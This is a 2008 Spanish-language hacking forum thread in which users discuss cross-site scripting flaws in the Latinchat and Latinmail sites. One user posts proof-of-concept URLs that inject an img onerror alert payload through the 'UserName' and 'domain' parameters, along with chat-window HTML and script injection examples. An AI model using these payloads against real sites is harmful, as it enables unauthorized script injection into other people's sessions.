elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
06 Octubre 2008, 20:12  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Bug Latinchat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Bug Latinchat  (Leído 1300 veces)
jeireuz

Conectado Conectado

Mensajes: 38


¿No es curioso encontrar alguien como yo?


Ver Perfil
Bug Latinchat
« en: 16 Febrero 2008, 03:06 »

Bien desde hace mucho, que conozco este bug

el cualquien ventana de platica es posible

enviar alertas, y cualquier tipo de senterncia java Script y VBS
En línea

La realidad es la veracidad de la creencia de la propia existencia.
bigsnake

Desconectado Desconectado

Mensajes: 606


Ver Perfil
Re: Bug Latinchat
« Respuesta #1 en: 16 Febrero 2008, 13:50 »

enviar sentencias de script??
a que te refieres??
se podrian ejecutar archivos remotamente de esa forma???

dw
En línea
z1x2c3z1x2c3|

Desconectado Desconectado

Mensajes: 31


Ver Perfil
Re: Bug Latinchat
« Respuesta #2 en: 16 Febrero 2008, 16:31 »

si .. la verdad que tmb conozco uno quizas sea el mismo .. se puede meter codigo en la ventana de chat .. quizas sea explotable. me pondre a ver que encuentro.yo pensaba que tenia html injection pero al final no le llegaba mi codigo al resto asi que me olvide.

salu2!
En línea
Rozor

Desconectado Desconectado

Mensajes: 238


As I Walk Through The Valley Of The Shadow Of Dead


Ver Perfil WWW
Re: Bug Latinchat
« Respuesta #3 en: 17 Febrero 2008, 18:53 »

¿Y la demostración?. Yo conozco desde hace tiempo un bug en el CNI y donde quiera si no lo demuestro....
En línea

Suck my Dick!!!
z1x2c3z1x2c3|

Desconectado Desconectado

Mensajes: 31


Ver Perfil
Re: Bug Latinchat
« Respuesta #4 en: 18 Febrero 2008, 00:46 »

Desmostrcion? no perdere tiempo en subir imagenes pero si podes ir a una sala de latinchat y donde escribis el mensaje pones <img src="URL"> y mostrara la imagen.
En línea
Rozor

Desconectado Desconectado

Mensajes: 238


As I Walk Through The Valley Of The Shadow Of Dead


Ver Perfil WWW
Re: Bug Latinchat
« Respuesta #5 en: 18 Febrero 2008, 11:06 »

No me referia a capturas me referia a lo que acabas de decir eso es la prueba de concepto ( PoC ) y es la demostración ;)
En línea

Suck my Dick!!!
berz3k
Moderador
*****
Desconectado Desconectado

Mensajes: 534



Ver Perfil
Re: Bug Latinchat
« Respuesta #6 en: 18 Febrero 2008, 11:38 »


Es importante antes de postear un nuevo tema leer y probar, mejor aun; realizar alguna especie de PoC (Proof Of Concept ), con estos detalles podremos ayudar o aportar mejores ideas para un buen entendimiento o posible "explotacion", no lanzar preguntas o posibles fallos "on air", tampoco son necesarios los "screenshots" o patallazos a menos que se requiera profundizar o detallar algun aspecto ademas de obsfuscar los detalles comprometedores. Leer las reglas del foro.


-berz3k.

@z1x2c3z1x2c3| cuanto tiempo podras invertir en presionar el boton "Impr Pant" y subirla al publico? 8 horas ? 10 horas? las imagenes, video o code, son la mejor parte de un PoC.



En línea
z1x2c3z1x2c3|

Desconectado Desconectado

Mensajes: 31


Ver Perfil
Re: Bug Latinchat
« Respuesta #7 en: 20 Febrero 2008, 05:09 »

Latinchat XSS

imagen:

http://img204.¡mageshack.us/img204/4500/43171804ii3.jpg


Input vulnerable 'UserName'

http://login04.latinchat.com/magma_qa/templates/modules/result/T2.php?UserName=%3Cimg%20src=http:%20onerror=alert(String.fromCharCode(88,83,83))%20/%3E&InstanceID=R31_1-1

--------------------------------------------------------------------------------------------------------------------------------------------------------------
Latin mail
http://img254.¡mageshack.us/img254/2719/pantallazo1xp1.png


http://www.latinmail.com/nousuario.php?domain=%3Cimg%20src=http:%20onerror=alert(String.fromCharCode(88,83,83))%20/%3E

------------------------------------------------------------------

ventana de chat

Código:
http://img411.¡mageshack.us/img411/7/dibujoaz4.jpg
Código:
http://img411.¡mageshack.us/img411/2485/dibujozr6.jpg

« Última modificación: 20 Febrero 2008, 14:20 por z1x2c3z1x2c3| » En línea
bigsnake

Desconectado Desconectado

Mensajes: 606


Ver Perfil
Re: Bug Latinchat
« Respuesta #8 en: 20 Febrero 2008, 16:37 »

pero, esto no se puede explotar de ninguna otra forma??
vease ejecucion archivos remota o algo por el estilo
grx
dw
En línea
z1x2c3z1x2c3|

Desconectado Desconectado

Mensajes: 31


Ver Perfil
Re: Bug Latinchat
« Respuesta #9 en: 20 Febrero 2008, 16:41 »

se puede ejecutar vbs o javascript por ejemplo <script>document.location='lala.js'</script> mm no se que màs se puede hacer remoto ..
yo habia encontrado esto

http://foro.elhacker.net/index.php/topic,197376.0.html
En línea
z1x2c3z1x2c3|

Desconectado Desconectado

Mensajes: 31


Ver Perfil
Re: Bug Latinchat
« Respuesta #10 en: 21 Febrero 2008, 03:25 »

no se seguire invstigando a ver si le saco provecho.saludos!
En línea
Páginas: [1] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats